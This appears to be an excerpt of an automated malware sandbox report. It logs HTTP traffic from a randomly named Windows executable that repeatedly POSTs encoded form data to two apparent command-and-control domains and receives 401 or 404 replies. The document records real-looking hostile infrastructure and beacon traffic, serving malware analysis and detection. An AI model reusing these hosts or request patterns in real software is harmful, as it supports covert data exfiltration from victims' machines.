                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.5499978.210.46.21802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:31.404820919 CET726OUTPOST /cm9a/ HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.prhmcjdz.tokyo
                                                                                          Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 31 5a 6b 39 41 79 4f 45 5a 46 4d 4a 4e 4b 66 61 4a 68 36 33 36 44 49 6f 72 4e 69 2f 59 6f 35 54 4e 53 39 68 64 74 73 47 50 76 4d 6a 78 7a 41 2f 55 33 51 67 78 33 67 59 49 4e 73 56 4a 56 70 54 42 57 37 64 5a 32 32 6b 52 54 63 75 50 79 6e 63 6d 6a 55 65 57 65 2b 4e 2b 6f 70 49 44 64 61 41 32 6e 69 30 2f 6c 62 7a 63 6e 6e 76 53 72 39 41 57 79 6c 4a 6f 70 4b 64 62 43 45 57 4f 41 71 68 6b 5a 55 74 48 66 4b 7a 58 64 62 63 62 2f 34 52 4d 42 36 6f 56 4a 45 62 7a 56 33 69 51 68 6c 78 43 30 7a 76 75 6f 78 66 43 33 35 6e 4f 66 6e 4f 53 65 44 7a 75 4c 57 4c 52 51 3d
                                                                                          Data Ascii: 8z=NtlY11u8ww8yv1Zk9AyOEZFMJNKfaJh636DIorNi/Yo5TNS9hdtsGPvMjxzA/U3Qgx3gYINsVJVpTBW7dZ22kRTcuPyncmjUeWe+N+opIDdaA2ni0/lbzcnnvSr9AWylJopKdbCEWOAqhkZUtHfKzXdbcb/4RMB6oVJEbzV3iQhlxC0zvuoxfC35nOfnOSeDzuLWLRQ=
                                                                                          Nov 24, 2024 08:21:33.009054899 CET508INHTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:32 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.5499988.210.46.21802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:34.129774094 CET746OUTPOST /cm9a/ HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.prhmcjdz.tokyo
                                                                                          Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 56 70 6b 75 33 6d 4f 55 4a 46 44 4b 4e 4b 66 44 5a 68 2b 33 36 48 49 6f 70 67 6e 2f 4c 63 35 53 6f 75 39 69 5a 35 73 54 50 76 4d 37 68 7a 46 37 55 33 66 67 78 36 54 59 49 68 73 56 49 78 70 54 42 47 37 64 4f 69 33 2b 68 54 65 37 2f 79 35 53 47 6a 55 65 57 65 2b 4e 2b 74 79 49 44 46 61 41 46 2f 69 31 62 35 61 2f 38 6e 6b 2b 53 72 39 45 57 7a 73 4a 6f 70 6f 64 61 75 71 57 4e 34 71 68 6b 70 55 73 53 72 46 6d 6e 64 5a 53 37 2f 6d 61 4d 6b 42 67 48 4d 52 5a 31 4d 52 6a 68 39 36 35 55 46 5a 31 4d 67 5a 4d 69 62 42 33 64 58 51 66 69 2f 71 70 4e 62 6d 56 47 48 54 6a 74 34 63 58 51 41 4b 46 75 49 5a 64 75 4d 2f 5a 47 49 6e
                                                                                          Data Ascii: 8z=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Lc5Sou9iZ5sTPvM7hzF7U3fgx6TYIhsVIxpTBG7dOi3+hTe7/y5SGjUeWe+N+tyIDFaAF/i1b5a/8nk+Sr9EWzsJopodauqWN4qhkpUsSrFmndZS7/maMkBgHMRZ1MRjh965UFZ1MgZMibB3dXQfi/qpNbmVGHTjt4cXQAKFuIZduM/ZGIn
                                                                                          Nov 24, 2024 08:21:35.649779081 CET508INHTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:35 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.5499998.210.46.21802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:36.798192978 CET1763OUTPOST /cm9a/ HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.prhmcjdz.tokyo
                                                                                          Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 4e 74 6c 59 31 31 75 38 77 77 38 79 76 56 70 6b 75 33 6d 4f 55 4a 46 44 4b 4e 4b 66 44 5a 68 2b 33 36 48 49 6f 70 67 6e 2f 4b 6b 35 53 61 57 39 6b 4c 52 73 42 2f 76 4d 6c 78 7a 45 37 55 33 34 67 78 69 66 59 49 38 4f 56 4c 5a 70 54 69 2b 37 4d 76 69 33 72 78 54 65 6b 76 79 6b 63 6d 6a 42 65 56 6d 36 4e 2b 39 79 49 44 46 61 41 45 50 69 7a 50 6c 61 39 38 6e 6e 76 53 72 68 41 57 7a 41 4a 6f 42 53 64 61 61 55 57 63 59 71 68 45 35 55 75 67 7a 46 36 33 64 58 48 37 2b 31 61 4d 59 65 67 47 68 2f 5a 31 52 32 6a 6d 52 36 6f 53 51 69 70 63 67 55 4f 79 62 77 37 64 50 63 50 32 37 36 33 4f 66 58 64 6c 57 30 6d 38 38 30 53 58 41 76 4e 39 68 53 4a 49 67 48 4a 78 63 7a 6e 62 6e 61 66 36 6b 51 2b 79 45 2b 32 4a 31 49 49 72 56 58 53 6d 6a 54 4e 38 31 57 4c 65 33 4f 46 55 55 57 53 6d 39 76 79 62 6b 66 61 57 34 62 30 35 6d 71 75 67 50 70 4a 72 67 49 54 63 75 43 51 4a 71 6c 55 48 69 4d 66 59 66 61 6e 35 62 4c 30 65 46 54 64 42 57 4f 4d 36 59 53 75 5a 6b 37 54 53 78 58 4a 71 58 59 57 6a 50 32 6a 77 4a 6a 52 65 61 [TRUNCATED]
                                                                                          Data Ascii: 8z=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Kk5SaW9kLRsB/vMlxzE7U34gxifYI8OVLZpTi+7Mvi3rxTekvykcmjBeVm6N+9yIDFaAEPizPla98nnvSrhAWzAJoBSdaaUWcYqhE5UugzF63dXH7+1aMYegGh/Z1R2jmR6oSQipcgUOybw7dPcP2763OfXdlW0m880SXAvN9hSJIgHJxcznbnaf6kQ+yE+2J1IIrVXSmjTN81WLe3OFUUWSm9vybkfaW4b05mqugPpJrgITcuCQJqlUHiMfYfan5bL0eFTdBWOM6YSuZk7TSxXJqXYWjP2jwJjReaFxUl4i4rqcvNAhgYekuvxWlxxxOUErXTlSdifpH6zgetNv0qKCK6WKPC61ys3E9p8af92pThABJ/+o1Vp6s12vxqzeYGL2iCOkX98T7LC/7bhdqIgr6uoT0QKe4iOMv13CkT9CoRIsfYWqU3q/zE1+6KW6dET+wYCIjvaPFRXap7b+DyWBO+qm+PDDjOiVtP1aQSZ6MDt5jz0ffIPdQFEgtBPybLENWoXjGx/ShT4drDKk83PLC7FwLruOFEyDnFnurRBjN/xqH19vAn87tkFsQgZtnQfBqV4TLNJy81lWKI6KgfdSBA5YKTsXFJ1acQ9VO9mbKxTbsUgCgupDKqw8zp6QuS0nUIfIs29hRzTND4UezqMThjtBusCNLTIpUUU0SIbYCUqLZpvMZIFzSoOMorqt0y6wUQufRfOtuBxX8MYJANJAErUqvfkb9r7XjIUv2mnymHDFesfQ6NsjB4Zo4xR7ZfgqDJxo46ALhi49BxgzA2E/VuA9ibo68cVHlhgesXKlJaahbVgUmzjdhnPRAxk7qRHHKHQRwuZZ2aTdjO5jGUVkbKqjKDGXnAd1T9ovfa4vGoj3FvhTLngSOYiPhr7XP+g4YVtLMqUmXrGJwhTxH37AIgInQtDn/iXrSqprb94IAXJtQxb4KfSTmLokSeuUNDJTh42g [TRUNCATED]
                                                                                          Nov 24, 2024 08:21:38.359129906 CET508INHTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:38 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                          Access-Control-Allow-Credentials: true
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.5500008.210.46.21802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:39.451864004 CET474OUTGET /cm9a/?8z=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvlhjap6ivTCbha0++M9x+FSojTXuY7LBG4JzCnBD9GjapUw==&afwXa=6nnHQlkprRILE HTTP/1.1
                                                                                          Host: www.prhmcjdz.tokyo
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Nov 24, 2024 08:21:41.020780087 CET427INHTTP/1.1 200
                                                                                          Server: nginx
                                                                                          Date: Sun, 24 Nov 2024 07:21:40 GMT
                                                                                          Content-Type: application/json;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Origin
                                                                                          Vary: Access-Control-Request-Method
                                                                                          Vary: Access-Control-Request-Headers
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          X-Cache: MISS
                                                                                          Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.550001203.161.43.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:46.395579100 CET723OUTPOST /6urf/ HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.connecty.live
                                                                                          Referer: http://www.connecty.live/6urf/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 203
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 47 2b 70 70 4d 39 34 72 31 6e 45 71 72 42 63 55 78 79 66 36 2b 6c 41 68 35 71 37 37 56 42 35 37 56 51 6c 49 43 6e 4a 54 63 71 52 32 39 68 56 55 30 51 6c 4f 51 64 52 4e 30 44 54 79 49 79 55 48 45 54 77 52 76 64 6a 64 31 76 49 48 39 54 52 52 64 35 34 32 69 6e 36 4b 4a 36 4b 54 61 66 31 63 76 37 58 31 49 2f 65 49 67 75 4f 33 6e 70 79 37 33 59 78 78 30 34 53 41 6d 52 36 46 50 45 4b 76 4e 4d 44 41 46 46 45 4f 70 68 4b 6b 6a 6e 38 33 76 35 79 6e 65 7a 6d 70 6a 6e 67 58 34 51 68 4d 47 4e 6f 67 34 43 67 30 33 6d 43 61 47 70 49 69 79 43 72 6c 4e 73 52 64 37 42 63 3d
                                                                                          Data Ascii: 8z=o8IUFI7bomKMG+ppM94r1nEqrBcUxyf6+lAh5q77VB57VQlICnJTcqR29hVU0QlOQdRN0DTyIyUHETwRvdjd1vIH9TRRd542in6KJ6KTaf1cv7X1I/eIguO3npy73Yxx04SAmR6FPEKvNMDAFFEOphKkjn83v5ynezmpjngX4QhMGNog4Cg03mCaGpIiyCrlNsRd7Bc=
                                                                                          Nov 24, 2024 08:21:47.613506079 CET658INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:47 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.550002203.161.43.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:49.065767050 CET743OUTPOST /6urf/ HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.connecty.live
                                                                                          Referer: http://www.connecty.live/6urf/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 55 70 37 57 78 56 49 44 69 31 54 66 71 52 32 32 42 56 52 36 77 6c 56 51 64 63 36 30 42 48 79 49 79 77 48 45 57 4d 52 73 75 62 53 36 66 49 46 32 7a 52 70 44 4a 34 32 69 6e 36 4b 4a 36 65 31 61 66 64 63 73 4c 6e 31 4a 62 4b 50 6a 75 4f 32 67 70 79 37 7a 59 78 31 30 34 54 6c 6d 51 6d 72 50 42 47 76 4e 4d 54 41 45 55 45 52 38 78 4c 4f 74 48 39 42 75 62 48 73 48 6b 47 47 68 68 31 44 75 52 68 70 4b 62 5a 4b 69 67 6f 63 6b 47 75 69 57 36 41 56 6a 79 4b 4d 58 50 42 74 6c 57 4a 6f 79 62 66 6b 6d 71 59 79 5a 36 6d 53 7a 68 67 2b 51 30 44 6b
                                                                                          Data Ascii: 8z=o8IUFI7bomKMHdxpKeQrkXEthhcU/Sf++lEh5vLrVUp7WxVIDi1TfqR22BVR6wlVQdc60BHyIywHEWMRsubS6fIF2zRpDJ42in6KJ6e1afdcsLn1JbKPjuO2gpy7zYx104TlmQmrPBGvNMTAEUER8xLOtH9BubHsHkGGhh1DuRhpKbZKigockGuiW6AVjyKMXPBtlWJoybfkmqYyZ6mSzhg+Q0Dk
                                                                                          Nov 24, 2024 08:21:50.380141020 CET658INHTTP/1.1 404 Not Found
                                                                                          Date: Sun, 24 Nov 2024 07:21:50 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 514
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.550003203.161.43.228802020C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Nov 24, 2024 08:21:51.743454933 CET1760OUTPOST /6urf/ HTTP/1.1
                                                                                          Host: www.connecty.live
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.connecty.live
                                                                                          Referer: http://www.connecty.live/6urf/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1239
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Raw: 38 7a 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 58 4a 37 57 47 39 49 46 46 68 54 65 71 52 32 2f 68 56 51 36 77 6b 48 51 64 55 32 30 42 62 49 49 30 30 48 48 30 30 52 37 76 62 53 74 76 49 46 35 54 52 53 64 35 35 2b 69 6e 71 4f 4a 36 4f 31 61 66 64 63 73 4a 2f 31 5a 2f 65 50 6c 75 4f 33 6e 70 79 2f 33 59 78 4e 30 34 71 59 6d 51 79 56 50 31 36 76 4e 74 6a 41 48 69 34 52 68 42 4c 4d 67 6e 39 4a 75 62 62 6a 48 6c 75 67 68 68 6f 65 75 57 56 70 50 65 73 67 33 54 4d 49 77 6b 4f 68 65 37 55 69 37 48 47 56 51 74 64 6e 35 45 39 58 2b 35 7a 47 6a 2b 6c 77 4e 59 33 75 6e 55 63 76 64 68 79 55 66 4c 75 58 4d 35 4b 30 59 44 4c 51 31 67 58 47 47 4b 50 4c 54 76 41 47 7a 37 6d 37 55 72 54 4b 2b 42 4e 7a 61 79 4f 6e 31 50 4b 69 39 6c 6f 34 34 61 62 70 32 49 49 4d 75 4d 6e 59 6f 41 38 70 43 2f 49 2b 78 61 6d 31 4f 53 76 69 49 41 42 34 50 48 4e 58 2f 57 72 74 36 34 4b 72 39 6e 30 6a 6b 4b 57 58 42 33 33 32 37 53 54 63 72 77 78 6d 68 6a 6c [TRUNCATED]
